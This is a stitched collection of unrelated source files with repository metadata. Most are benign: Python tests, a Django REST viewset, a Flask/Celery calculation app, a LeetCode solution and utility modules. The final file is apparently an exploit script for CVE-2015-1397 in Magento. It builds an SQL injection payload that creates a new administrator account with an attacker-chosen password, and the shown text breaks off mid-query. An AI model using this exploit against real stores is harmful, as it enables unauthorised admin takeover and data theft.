# ------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # -------------------------------------------------------------------------- """Test Text to DF magic.""" import pandas as pd import pytest_check as check from msticpy.datamodel.pivot_magic_core import run_txt2df __author__ = "Ian Hellen" # pylint: disable=redefined-outer-name _INPUT_TEST = """ file, lines1, lines2, lines3, percent msticpy___init__.py, 24, 12, 0, 50% msticpy__version.py, 1, 0, 0, 100% msticpy_analysis___init__.py, 3, 0, 0, 100% msticpy_analysis_anomalous_sequence___init__.py, 3, 0, 0, 100% msticpy_analysis_anomalous_sequence_anomalous.py, 34, 26, 0, 24% msticpy_analysis_anomalous_sequence_model.py, 222, 196, 0, 12% msticpy_analysis_anomalous_sequence_sessionize.py, 59, 52, 0, 12% msticpy_analysis_anomalous_sequence_utils___init__.py, 3, 0, 0, 100% msticpy_analysis_anomalous_sequence_utils_cmds_only.py, 76, 63, 0, 17% msticpy_analysis_anomalous_sequence_utils_cmds_params_only.py, 105, 91, 0, 13% msticpy_analysis_anomalous_sequence_utils_cmds_params_values.py, 126, 111, 0, 12% msticpy_analysis_anomalous_sequence_utils_data_structures.py, 27, 16, 0, 41% msticpy_analysis_anomalous_sequence_utils_laplace_smooth.py, 34, 28, 0, 18% msticpy_analysis_anomalous_sequence_utils_probabilities.py, 42, 35, 0, 17% """ # Magic args # "--sep", # "--name", # "--headers", # "--keepna", def test_txt2df(): """Test txt2df magic function.""" res_df = run_txt2df(line="", cell=_INPUT_TEST, local_ns=None) check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (15, 5)) # headers res_df = run_txt2df(line="--headers", cell=_INPUT_TEST, local_ns=None) check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (14, 5)) for col in _INPUT_TEST.split("\n")[1].split(","): check.is_in(col.strip(), list(res_df.columns)) # separator res_df = run_txt2df( line="--headers --sep=\t", cell=_INPUT_TEST.replace(",", "\t"), local_ns=None ) check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (14, 5)) # some malformed lines cell_input = [] for idx, line in enumerate(_INPUT_TEST.split("\n")): if line and idx % 5 != 3: cell_input.append(line + ",") else: cell_input.append(line) res_df = run_txt2df(line="--headers", cell="\n".join(cell_input), local_ns=None) # expect output with dropped columns check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (14, 5)) res_df = run_txt2df( line="--headers --keepna", cell="\n".join(cell_input), local_ns=None ) # expect output with no dropped columns check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (14, 6)) # add extra delimiters for 2 empty columns cell_input = [line + ", ," for line in _INPUT_TEST.split("\n") if line] res_df = run_txt2df( line="--headers --keepna", cell="\n".join(cell_input), local_ns=None ) # expect output with cols following header row check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (14, 7)) for col in ("Unnamed: 5", "Unnamed: 6"): check.is_in(col.strip(), list(res_df.columns)) # keepna should force blank columns to remain res_df = run_txt2df(line="--keepna", cell="\n".join(cell_input), local_ns=None) check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (15, 7)) # name namespace = {} res_df = run_txt2df( line="--headers --name=my_df", cell=_INPUT_TEST, local_ns=namespace ) check.is_instance(res_df, pd.DataFrame) check.equal(res_df.shape, (14, 5)) check.is_in("my_df", namespace) check.is_instance(namespace["my_df"], pd.DataFrame) check.equal(namespace["my_df"].shape, (14, 5))
UTF-8
Python
false
false
3,973
py
374
test_txt_df_magic.py
244
0.627234
0.590486
0
105
36.838095
85
dillan08/PAT
781,684,062,325
08e87b9bdd29e7d1b764f9b07d92253075c6a074
5528290429e3e98be841dc8a8ea504aa657f0187
/interesesCRUD/views.py
e8c553c895fefe3dd57a29fd08f1766b37a34d77
[]
no_license
https://github.com/dillan08/PAT
ac8973c2ccd9efbd8692bce4173dfc3e307e5a5a
39a75bc2a29bcaf7457c886989f291623dcd465d
refs/heads/development
"2020-09-15T01:44:55.021000"
"2016-10-21T13:29:08"
"2016-10-21T13:29:08"
67,364,883
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from rest_framework import viewsets from rest_framework.response import Response from rest_framework import status from interesesCRUD.serializer import InteresSerializer from nucleo.models import Interes # Create your views here. class InteresVS(viewsets.ModelViewSet): serializer_class = InteresSerializer queryset = Interes.objects.all() def create(self, request, *args, **kwargs): serializer = self.get_serializer(data=request.data) serializer.is_valid(raise_exception=True) self.perform_create(serializer) headers = self.get_success_headers(serializer.data) return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
UTF-8
Python
false
false
701
py
37
views.py
36
0.758916
0.754636
0
19
35.842105
89
cccgp/Machine-Learning-Algorithms
7,206,955,150,475
5f190bacf4f98973372152479e50f67ffa0e52eb
105683b026cee117aa6d684b7450b3bb0d83094e
/hmm/tests/test_hmm.py
41b174adbc4152748a5e2ef878a1ad9b1679cffa
[]
no_license
https://github.com/cccgp/Machine-Learning-Algorithms
72debf53e89f4223ff45ebd3ca68587e39632d1e
ea1768ffc23f9ffb2d46172eb12c036f28ee09e6
refs/heads/master
"2020-04-24T18:03:42.579000"
"2019-02-28T03:18:02"
"2019-02-28T03:18:02"
172,168,321
1
1
null
null
null
null
null
null
null
null
null
null
null
null
null
import numpy as np from hmm.hmm import Hmm import time def test_hmm(): A = np.array([[0.5, 0.2, 0.3], [0.3, 0.5, 0.2], [0.2, 0.3, 0.5]]) B = np.array([[0.5, 0.5], [0.4, 0.6], [0.7, 0.3]]) PI = np.array([0.2, 0.4, 0.4]) O = np.array([0, 1, 0]) model = Hmm() model.forward(A, B, PI, O) model.vibiter(A, B, PI, O) if __name__ == '__main__': start = time.time() test_hmm() end = time.time()
UTF-8
Python
false
false
452
py
17
test_hmm.py
16
0.462389
0.376106
0
20
20.6
69
Sergey-Laznenko/Stepik
6,880,537,646,653
c7c6b0dedae60d9d54c88dc2bd58a64d326b0447
f7463bd0ab18b41611d5ac725f65d3db3a3a7a1d
/Generation Python - A Beginner's Course/13_Functions/13.4(return)/6.py
935283dad1bd12b2d645cfb70defe4c8b60e6d5c
[]
no_license
https://github.com/Sergey-Laznenko/Stepik
f81c5aeead3fbd20628129d60ccce92b34724b97
5e1a1a76c3f6ed487cf8fc847913c890c8eac840
refs/heads/master
"2022-12-28T19:01:48.670000"
"2020-10-18T15:23:58"
"2020-10-18T15:23:58"
279,022,462
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
""" Напишите функцию convert_to_miles(km), которая принимает в качестве аргумента расстояние в километрах и возвращает расстояние в милях. """ def convert_to_miles(km): return km * 0.6214 num = int(input()) print(convert_to_miles(num))
UTF-8
Python
false
false
341
py
299
6.py
298
0.729508
0.709016
0
12
19.333333
101
rnlascano/PyMonitorMQTT
2,473,901,179,691
33f9b7682705b5204739d6236b545afc16525e48
b74c7f4cb3a460566e43b476e19b080eb93cc85f
/Sensors/RamSensor/RamSensor.py
ec07b9e9756583e4bb3ed1e1daee7fa47954a560
[]
no_license
https://github.com/rnlascano/PyMonitorMQTT
37e87fe7748ef0476b5c425ea50f5169adcfe578
c991a130bec808c16a0c02959cce379e3adef6fb
refs/heads/master
"2022-12-05T01:18:24.762000"
"2020-08-31T19:50:46"
"2020-08-31T19:50:46"
291,809,554
0
0
null
true
"2020-08-31T19:50:47"
"2020-08-31T19:46:04"
"2020-08-31T19:46:06"
"2020-08-31T19:50:46"
817
0
0
0
null
false
false
import psutil from Sensors.Sensor import Sensor TOPIC_RAM_PERCENTAGE = 'ram_used_percentage' class RamSensor(Sensor): def Initialize(self): self.AddTopic(TOPIC_RAM_PERCENTAGE) def Update(self): self.SetTopicValue(TOPIC_RAM_PERCENTAGE, self.GetSystemRam()) def GetSystemRam(self): return psutil.virtual_memory()[2]
UTF-8
Python
false
false
356
py
15
RamSensor.py
13
0.707865
0.705056
0
16
21.25
69
extreme-developers/ShoppingOnline
6,176,163,013,801
02685eea4e054c6dd198f6cb3e56eb851c0da1c7
356bbc95f450735840b5be1fffabc67d300f607a
/apps/mobiles/migrations/0005_typicalspecification_wifi.py
80b24616892e319a81710a0a5c55d4c6ed11bafb
[]
no_license
https://github.com/extreme-developers/ShoppingOnline
fb78be9ccd998e06143a890bbd68ba09b23c12f9
d4606315f1c2ee29e30a1cb47ee5dac3a3d640ac
refs/heads/master
"2020-06-10T01:33:58.642000"
"2018-03-08T12:51:00"
"2018-03-08T12:57:32"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*- # Generated by Django 1.9.8 on 2017-10-17 09:05 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('mobiles', '0004_auto_20171017_0843'), ] operations = [ migrations.AddField( model_name='typicalspecification', name='wifi', field=models.IntegerField(choices=[(1, '支持'), (2, '不支持')], default=1, verbose_name='WIFI'), ), ]
UTF-8
Python
false
false
523
py
138
0005_typicalspecification_wifi.py
92
0.596491
0.528265
0
20
24.65
103
yiziqi/vega
249,108,142,850
5f4b681f5556dc4ae36768d60652d48500413922
6bd21a64c5fbeba1682c3e65221f6275a44c4cd5
/vega/networks/__init__.py
9059f749e06ac4778ff9da8bcc68db5b581fcf33
[ "MIT" ]
permissive
https://github.com/yiziqi/vega
e68935475aa207f788c849e26c1e86db23a8a39b
52b53582fe7df95d7aacc8425013fd18645d079f
refs/heads/master
"2023-08-28T20:29:16.393000"
"2021-11-18T07:28:22"
"2021-11-18T07:28:22"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding:utf-8 -*- # Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved. # This program is free software; you can redistribute it and/or modify # it under the terms of the MIT License. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # MIT License for more details. """Import and register network automatically.""" from vega.common.class_factory import ClassFactory from .network_desc import NetworkDesc ClassFactory.lazy_register("vega.networks", { "adelaide": ["AdelaideFastNAS"], "bert": ["BertClassification", "TinyBertForPreTraining", "BertClassificationHeader"], "dnet": ["DNet", "DNetBackbone", "EncodedBlock"], "erdb_esr": ["ESRN"], "faster_backbone": ["FasterBackbone"], "faster_rcnn": ["FasterRCNN"], "mobilenet": ["MobileNetV3Tiny", "MobileNetV2Tiny"], "mobilenetv3": ["MobileNetV3Small", "MobileNetV3Large"], "necks": ["FPN"], "quant": ["Quantizer"], "resnet_det": ["ResNetDet"], "resnet_general": ["ResNetGeneral"], "resnet": ["ResNet"], "resnext_det": ["ResNeXtDet"], "sgas_network": ["SGASNetwork"], "simple_cnn": ["SimpleCnn"], "spnet_backbone": ["SpResNetDet"], "super_network": ["DartsNetwork", "CARSDartsNetwork", "GDASDartsNetwork"], "text_cnn": ["TextCells", "TextCNN"], "gcn": ["GCN"], "vit": ["VisionTransformer"], "mtm_sr": ["MtMSR"], "unet": ["Unet"] }) def register_networks(backend): """Import and register network automatically.""" if backend == "pytorch": from . import pytorch elif backend == "tensorflow": from . import tensorflow elif backend == "mindspore": from . import mindspore
UTF-8
Python
false
false
1,821
py
217
__init__.py
197
0.660077
0.654585
0
50
35.42
89
harrylee0810/TIL-c9
6,107,443,514,638
9fb23a2fe750fdd680bfe31d8f9f1ed0d81858cf
bb193c259e7efd696921496b92ec45dfdf3fe5a1
/django/auth/posts/admin.py
014a0dc9c082b3bd771df69a635927566165c6c7
[]
no_license
https://github.com/harrylee0810/TIL-c9
6f6526ac03690d29fb278f5c7903f90c254a510b
4a811e20d9ae9df17cf41c33047e4c876cacc8a8
refs/heads/master
"2020-04-17T17:18:15.261000"
"2019-02-12T08:59:29"
"2019-02-12T08:59:29"
166,777,152
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.contrib import admin from .models import Post, Comment #내용도 같이 보이게 admin 페이지를 커스터마이징 할 필요 있음 class PostAdmin(admin.ModelAdmin): list_display = ('title','content','created_at','updated_at',) # Register your models here. admin.site.register(Post, PostAdmin) admin.site.register(Comment)
UTF-8
Python
false
false
350
py
14
admin.py
11
0.753289
0.753289
0
12
24.416667
65
zjulyx/LeetCodePython
2,276,332,684,502
7bd8021086d7ffb64013d31d27be4850b291826c
ccb288ffd441565d6dd40de7746325d51b7722d5
/Medium/面试题 08.14. 布尔运算.py
b0e7861d10b0e5739a33b7aab4ab89b3dfc618d4
[]
no_license
https://github.com/zjulyx/LeetCodePython
1dfbe765859dc90a13d2db2629bbbbd025bea94c
8953a8f7db215df169691b411e7eba47e5ac3632
refs/heads/master
"2020-03-26T21:53:25.716000"
"2020-03-26T10:40:04"
"2020-03-26T10:40:04"
145,415,356
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# 给定一个布尔表达式和一个期望的布尔结果 result,布尔表达式由 0 (false)、1 (true)、& (AND)、 | (OR) 和 ^ (XOR) 符号组成。实现一个函数,算出有几种可使该表达式得出 result 值的括号方法。 # 示例 1: # 输入: s = "1^0|0|1", result = 0 # 输出: 2 # 解释: 两种可能的括号方法是 # 1^(0|(0|1)) # 1^((0|0)|1) # 示例 2: # 输入: s = "0&0&0&1^1|0", result = 1 # 输出: 10 # 提示: # 运算符的数量不超过 19 个 # 通过次数65提交次数169 # 来源:力扣(LeetCode) # 链接:https://leetcode-cn.com/problems/boolean-evaluation-lcci # 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。 class Solution: def countEval(self, s: str, result: int) -> int: # 分治法, cal返回当前表达式0和1的数目 # 对于每个操作符, 分别计算其左右表达式的0和1的数目, 然后根据操作符本身得到当前操作符的对应的0和1的数目 # 使用一个字典将结果保存下来加速运算 d = {} def cal(s): if len(s) == 1: return (1 - int(s), int(s)) if s in d: return d[s] cur0, cur1 = 0, 0 for i in range(1, len(s)): if s[i] == '&' or s[i] == '|' or s[i] == '^': l0, l1 = cal(s[0:i]) r0, r1 = cal(s[i + 1:]) if s[i] == '&': cur0 += l0 * r0 + l0 * r1 + l1 * r0 cur1 += l1 * r1 elif s[i] == '|': cur0 += l0 * r0 cur1 += l1 * r1 + l0 * r1 + l1 * r0 else: cur0 += l0 * r0 + l1 * r1 cur1 += l0 * r1 + l1 * r0 d[s] = (cur0, cur1) return d[s] return cal(s)[result] if __name__ == '__main__': try: print(Solution().countEval(s="1^0", result=0)) # or Execute() print(Solution().countEval(s="1^0|0", result=0)) # or Execute() print(Solution().countEval(s="1^0|0|1", result=1)) # or Execute() print(Solution().countEval(s="0&0&0&1^1|0", result=0)) # or Execute() except Exception as err: print(err)
UTF-8
Python
false
false
2,393
py
787
面试题 08.14. 布尔运算.py
784
0.430269
0.37655
0
64
28.25
121
King-Of-Game/Python
17,154,099,400,376
6a6001c98f3f8ee05081bd7e1c0074b0663510c6
36afa271f080459adf1014cd23f4be9f954dfee6
/Example/date/生成日历.py
356d0d16c377d1ae4ad432132a237cf0249658d6
[]
no_license
https://github.com/King-Of-Game/Python
b69186a7574ce1c0b7097207cfe9a2eb38a90bc0
643b9fd22efd78f6679735f23432943a57b5f5bb
refs/heads/master
"2023-05-25T05:35:14.473000"
"2021-10-24T12:52:21"
"2021-10-24T12:52:21"
151,251,434
3
0
null
false
"2023-05-01T20:51:50"
"2018-10-02T12:34:04"
"2021-10-24T12:52:41"
"2023-05-01T20:51:50"
90,134
1
0
3
HTML
false
false
#! /usr/bin/env python3 # -*- coding: utf-8 -*- # __author__ : YiXuan # __date__ : 1/17/2021 1:15 PM # __software__ : PyCharm ''' 使用内置模块:calendar 生成日历 ''' import calendar # 生成日历 def generateCalender(): while True: input_txt = input('***日历(输入q退出)***\n:') if input_txt in ['q', 'Q']: break try: year = int(input('请输入年份: ')) month = int(input('请输入月份: ')) # 显示日历 print(calendar.month(year, month)) except ValueError: print('请输入合法的年份和月份!') if __name__ == '__main__': generateCalender()
UTF-8
Python
false
false
701
py
250
生成日历.py
213
0.497512
0.477612
0
34
16.735294
47
kate-melnykova/Scientific-functions
163,208,790,147
6578105d74c3193e99407a39c6a97ee5a75c1cd5
f965d7db19fb8e032fa1b7dc028522a47ba9307d
/calcs/main.py
abd5bd45206521e35f0de41ede9eeeb88f5b68b0
[]
no_license
https://github.com/kate-melnykova/Scientific-functions
8da976a45933ac062404ae1ef957c336388a302a
697cedf42845efddd4d7ebc92d4237604df9014d
refs/heads/master
"2020-06-05T09:33:29.463000"
"2019-09-07T05:36:44"
"2019-09-07T05:36:44"
192,393,110
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from time import time from flask import Blueprint from flask import flash from flask import url_for from flask import redirect from flask import request from flask import render_template from flask_login import LoginManager, UserMixin, login_required,\ login_user, logout_user, current_user import json from redis import Redis from factory_app import factory_app from redispy import get_connection from views.auth import User from views.auth.login_form import auth from sci_funcs.tasks import args_to_function from sci_funcs.function_registry import function_registry app, celery = factory_app() ###### # LoginManager setup ###### login_manager = LoginManager() login_manager.init_app(app) @login_manager.user_loader def user_loader(username): user_db = get_connection(db=app.config['USER_DB']).get(username) if user_db is not None: return User.deserialize(user_db) else: return None app.register_blueprint(auth) @app.route('/', methods=['GET']) @app.route('/index', methods=['GET']) def index(): print(f'Current user on index page {current_user}') return render_template('index.html') @app.route('/schedule_calculation', methods=['POST']) def schedule_calculation(): assert request.method == 'POST' func_name = request.form['func_name'] if func_name in function_registry: arguments = dict() arguments['func_name'] = func_name arguments['status'] = 'IN PROGRESS' arguments['start_time'] = time() for item in function_registry[func_name][1:]: arguments[item] = request.form[item] # get task identifier get_connection(db=app.config['CALCS_DB']) async_result = args_to_function.delay(arguments, function_registry[func_name][1:]) message = json.dumps({"status": "PENDING", "result": arguments, "task_id": async_result.task_id }) get_connection(db=app.config['CALCS_DB']).set(f'celery-task-meta-{async_result.task_id}', message) return redirect(url_for('view_results')) else: assert func_name == 'expression' expression = request.form.expression flash(f'Submitted {expression}') return redirect(url_for('index')) @app.route('/view_results', methods=['GET']) def view_results(): results_temp = {} connection = get_connection(db=app.config['CALCS_DB']) for key in connection.keys('*'): result = json.loads(connection.get(key)) task_id = result['task_id'] result = result['result'] results_temp[task_id] = result return render_template('view_results.html', results=results_temp) @app.route('/result', methods=['GET']) @login_required def view_specific_results(): task_id = str(request.args.get('task_id', '')) key = str.encode(f'celery-task-meta-{task_id}') try: result = json.loads(get_connection(db=app.config['CALCS_DB']).get(key)) except: flash('Task not found') return redirect(url_for('index')) result = result['result'] return render_template(f'{ result["func_name"] }.html', result=result) """ next = flask.request.args.get('next') # is_safe_url should check if the url is safe for redirects. # See http://flask.pocoo.org/snippets/62/ for an example. if not is_safe_url(next): return flask.abort(400) return flask.redirect(next or flask.url_for('index')) # handle login failed @app.errorhandler(401) def page_not_found(e): return Response('<p>Login failed</p>') """
UTF-8
Python
false
false
3,763
py
23
main.py
12
0.623173
0.620516
0
125
29.112
97
zufishantaj/mycodebase
2,259,152,830,516
43511dba102fa440f60d2ec79e4e14ae258f1db1
39fbaaa26779579ca1a6cfde95520425ae66ed89
/Class2/second.py
ac26dd91d29f0fc2abf8f49822a93717278e1c8e
[]
no_license
https://github.com/zufishantaj/mycodebase
02eb7d846a69bba2de1df27c068919a00c3f4d8c
74cba0a315bd129eff86190fbf4421ba28ab9a92
refs/heads/master
"2022-12-31T19:14:01.574000"
"2020-10-27T20:26:16"
"2020-10-27T20:26:16"
268,316,063
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
print('Please enter your name') x=input() print("Hello, "+ x)
UTF-8
Python
false
false
64
py
63
second.py
42
0.640625
0.640625
0
3
19.666667
31
tingleshao/leetcode
704,374,681,878
b6d9264107aaef6b00363629f1af6e7bda770158
02425f5fffe5f46961c3167c46302ef84c6e48a4
/palindrome_partitioning/main.py
0c58ebc78f553d215972a5b91fda0237e68af093
[]
no_license
https://github.com/tingleshao/leetcode
583718b5e58c3611f3db352d82017ba1d4482f18
e2c589a1e81282e1c3deb6dfc5cace595acb841b
refs/heads/master
"2021-01-23T03:43:31.256000"
"2015-01-23T18:00:25"
"2015-01-23T18:00:25"
29,308,438
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
class Solution: # @param s, a string # @return a list of lists of string def partition(self, s): result = [] output = [] self.DFS(s,0,output,result) return result def isPalindrome(self,s,start,end): # print start # print end while start < end: if s[start] != s[end]: return False start += 1 end -= 1 return True def DFS(self, s, start, output, result): if start == len(s): result.append(output) return for i in xrange(start,len(s)): if self.isPalindrome(s, start, i): output.append(s[start:i+1]) # print output self.DFS(s,i+1,list(output),result) output.pop(-1) def main(): s = Solution() sti = "aab" print s.partition(sti) if __name__ == "__main__": main()
UTF-8
Python
false
false
880
py
148
main.py
147
0.506818
0.5
0
37
22.810811
45
ShangSky/YangShop
9,637,906,647,953
ab56abe248bf279b90c3100a06cc82f5ad7a1d7f
6a96f3ed9cdffd3548845b44931e99345d7ba231
/FoodShop/apps/goods/admin.py
cb1b08c1a72d35974b57a5c688dda21aaabe7f41
[]
no_license
https://github.com/ShangSky/YangShop
ffca8c4d6e8468288dd6ce3e45e740e9cdc600ef
d2a7d0c1155fd7627d8bf7427bc72e9f2ee15fe9
refs/heads/master
"2020-06-22T12:45:11.749000"
"2020-06-06T03:17:04"
"2020-06-06T03:17:04"
197,717,146
2
1
null
false
"2021-04-08T19:34:38"
"2019-07-19T06:43:01"
"2020-06-06T03:17:31"
"2021-04-08T19:34:35"
2,954
2
1
13
Python
false
false
from django.contrib import admin from .models import Goods, GoodsBanner, Category, IndexBanner admin.site.site_header = admin.site.site_title = admin.site.index_title = '阳哥商城后台管理' @admin.register(Goods) class GoodsAdmin(admin.ModelAdmin): pass @admin.register(GoodsBanner) class GoodsBannerAdmin(admin.ModelAdmin): pass @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(IndexBanner) class IndexBannerAdmin(admin.ModelAdmin): pass
UTF-8
Python
false
false
507
py
67
admin.py
43
0.775967
0.775967
0
23
20.304348
84
pmontu/indian_farming
11,854,109,739,581
7d30e2a5dad381de4e7cf912d2ac11bad4e532b9
c2a663f9892510c6069a23bc75710758476585b1
/usermgmt/serializers.py
787edacdbfc84ded032cfa0e75d014864579cd62
[]
no_license
https://github.com/pmontu/indian_farming
6e7f663520a8dcd162a7b654b61f86119c86da24
bdf3270d70c9ca487d52fdba7a865830ecd31580
refs/heads/master
"2021-01-21T05:23:04.678000"
"2017-02-27T05:44:34"
"2017-02-27T05:44:34"
83,179,818
2
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.contrib.auth.models import User from rest_framework import serializers from rest_framework.validators import UniqueValidator from .models import CustomUser class UserSerializer(serializers.Serializer): id = serializers.IntegerField(read_only=True) username = serializers.CharField(validators=[UniqueValidator(queryset=User.objects.all())]) user_type = serializers.ChoiceField( CustomUser.SPECIAL_USER_CHOICES, source="customuser.user_type") password = serializers.CharField( max_length=128, write_only=True, style={'input_type': 'password'}) is_superuser = serializers.BooleanField(read_only=True) def create(self, validated_data): customuser = validated_data.pop("customuser") user = User.objects.create_user(**validated_data) user_type = customuser["user_type"] CustomUser.objects.create(user=user, user_type=user_type) return user class Meta: model = User
UTF-8
Python
false
false
983
py
20
serializers.py
18
0.713123
0.710071
0
27
35.444444
95
verma7/dcos-cassandra-service-new
15,513,421,897,305
1370135a4616813c94d1bd380fe2ab22c84b2766
8a421507d3f46eee694f91813dd39a403de57dd5
/cli/dcos_cassandra/cassandra_utils.py
9cd9aa10b675bfbfca574cd954ed0caba2cea3cd
[ "Apache-2.0" ]
permissive
https://github.com/verma7/dcos-cassandra-service-new
c3e557df8cec2583f07e1457c6aff016461d1054
0e02914513e191b7b78d14f2b0b2525a092363ff
refs/heads/master
"2020-04-05T00:35:26.189000"
"2016-10-05T00:32:19"
"2016-10-05T00:48:59"
67,839,518
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# # Copyright (C) 2015 Mesosphere, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json from dcos import util __fwk = None def get_fwk_name(): return __fwk \ or util.get_config().get('cassandra.service_name') \ or "cassandra" def set_fwk_name(name): global __fwk __fwk = name def base_url(): return util.get_config().get('core.dcos_url').rstrip("/") def marathon_url(slash_command): return "%s/marathon/v2%s" % (base_url(), slash_command) def api_url(slash_command): base_config_url = util.get_config().get('cassandra.url') if base_config_url is not None: base_config_url = base_config_url.rstrip("/") else: base_config_url = "%s/service/%s" % (base_url(), get_fwk_name()) return "%s/v1%s" % (base_config_url, slash_command) def to_json(responseObj): # throw any underlying request error responseObj.raise_for_status() # return json return responseObj.json() def print_json(jsonObj): print(json.dumps(jsonObj, sort_keys=True, indent=4, separators=(',', ': ')))
UTF-8
Python
false
false
1,641
py
146
cassandra_utils.py
127
0.648995
0.642291
0
62
25.467742
74
vilmarferreira/recibo_1
2,113,123,918,256
135a106ccb8e97cdb998bcf048b863a09f52d856
e5b8d3fd12423648c9f0675d3b89b75fcd5a560b
/core/form.py
887f5137369e4a98f4e024537b351e1ca8d6918f
[]
no_license
https://github.com/vilmarferreira/recibo_1
834cca4e64121f87a05ef976920ce5ffe2a36890
1fab47df4408609063bd40f563f1e7bc1e32c589
refs/heads/master
"2020-04-13T17:11:22.393000"
"2018-12-27T22:26:47"
"2018-12-27T22:26:47"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django import forms from dal import autocomplete from core.models import Receipt, Person class ReceiptForm(forms.ModelForm): person = forms.ModelChoiceField(queryset=Person.objects.all(),widget=autocomplete.ModelSelect2(url='person-autocomplete')) class Meta: model=Receipt exclude= ()
UTF-8
Python
false
false
317
py
9
form.py
4
0.753943
0.750789
0
11
27.909091
126
parmarjh/graph-analytics-course
8,315,056,726,242
77f5b9fd6ef6bbc943dda37c5369a3f6182a39b7
bfccc163836369bb5e4b8a180ae0bda14bbdf6c2
/lecture-4/flows/flows.py
c086e520ad56c4a27c0f948b3c5b162c2b267407
[]
no_license
https://github.com/parmarjh/graph-analytics-course
dcec11eeb1d197b65a22f4e5cbadf509682d3912
0f04b0b743817f2f465e861938d055e644eefaeb
refs/heads/master
"2023-08-15T15:59:49.099000"
"2021-09-28T03:54:52"
"2021-09-28T03:54:52"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import networkx as nx import matplotlib.pyplot as plt import pprint as pp G = nx.read_edgelist('./graph-flow.txt', nodetype=str, data=(('capacity', int),), create_using=nx.DiGraph()) pos = nx.spring_layout(G) nx.draw(G, pos, with_labels=True, node_color="#f86e00") flow = nx.maximum_flow(G, _s="s", _t="t") flow_value = nx.maximum_flow_value(G, _s="s", _t="t") pp.pprint(flow) print("Maximum flow value is: " + str(flow_value)) plt.show()
UTF-8
Python
false
false
467
py
87
flows.py
51
0.640257
0.631692
0
19
23.578947
74
Pycord-Development/pycord
16,363,825,413,142
709a8ca05db1f5d451dc6888781042788a38536b
681d42ab5a237b580436eab6271768aefee3048e
/discord/types/__init__.py
79e1e68bb7fbb6d1e91c2b0a2303a2f13c701158
[ "MIT" ]
permissive
https://github.com/Pycord-Development/pycord
d2555f7e08f0eea29653ee1e4f6fb7847a859500
a3bd2a04fbd7ac0cec5a119cc9b360965aaaab8e
refs/heads/master
"2023-08-29T07:10:24.810000"
"2023-08-29T01:37:00"
"2023-08-29T01:37:00"
400,837,389
2,960
941
MIT
false
"2023-09-11T20:15:37"
"2021-08-28T16:18:37"
"2023-09-11T14:24:43"
"2023-09-11T20:15:36"
15,833
2,540
433
93
Python
false
false
""" discord.types ~~~~~~~~~~~~~~ Typings for the Discord API :copyright: (c) 2015-2021 Rapptz & (c) 2021-present Pycord Development :license: MIT, see LICENSE for more details. """
UTF-8
Python
false
false
183
py
126
__init__.py
79
0.666667
0.601093
0
9
19.333333
70
mygit2014/vulnexipy
1,889,785,645,290
c3685fe893985e37b544d2340587e1a515291041
5508a6634049bc83627f65337c1070c8f4c6d2e0
/cve_2015_1397.py
f7b9742bd9b0324875c13ebb2095dca1ab1425c1
[]
no_license
https://github.com/mygit2014/vulnexipy
6163e5e77724a4be5babf8afd76f4be5143c5845
c7dc0d4dabf48893baf0dc5c7b614cc62b5016e8
refs/heads/master
"2023-04-21T10:45:56.438000"
"2021-05-10T10:38:26"
"2021-05-10T10:38:26"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import requests import sys import base64 import argparse from log_colors import * # SQL injection vulnerability in the getCsvFile # function in the Mage_Adminhtml_Block_Widget_Grid # class in Magento Community Edition (CE) 1.9.1.0 # and Enterprise Edition (EE) 1.14.1.0 # allows remote administrators to execute arbitrary # SQL commands via the popularity[field_expr] # parameter when the popularity[from] or popularity[to] parameter is set. class CVE2015_1397: def __init__(self, url, user, pswd): print (LogColors.BLUE + "victim: " + url + "..." + LogColors.ENDC) self.url = url self.user, self.pswd = user, pswd self.session = requests.Session() def exploit(self): print (LogColors.BLUE + "exploitation..." + LogColors.ENDC) q = "SET @SALT = 'rp';" q += "SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{passwd}')".format(passwd = self.pswd) q += " ), CONCAT(':', @SALT ));" q += "SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;" q += "INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`," q += "`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`," q += "`rp_token_created_at`) " q += "VALUES ('Firstname','Lastname','hacked@hack.com','{user}',".format(user = self.user) q += "@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());" q += "INSERT INTO `admin_role` 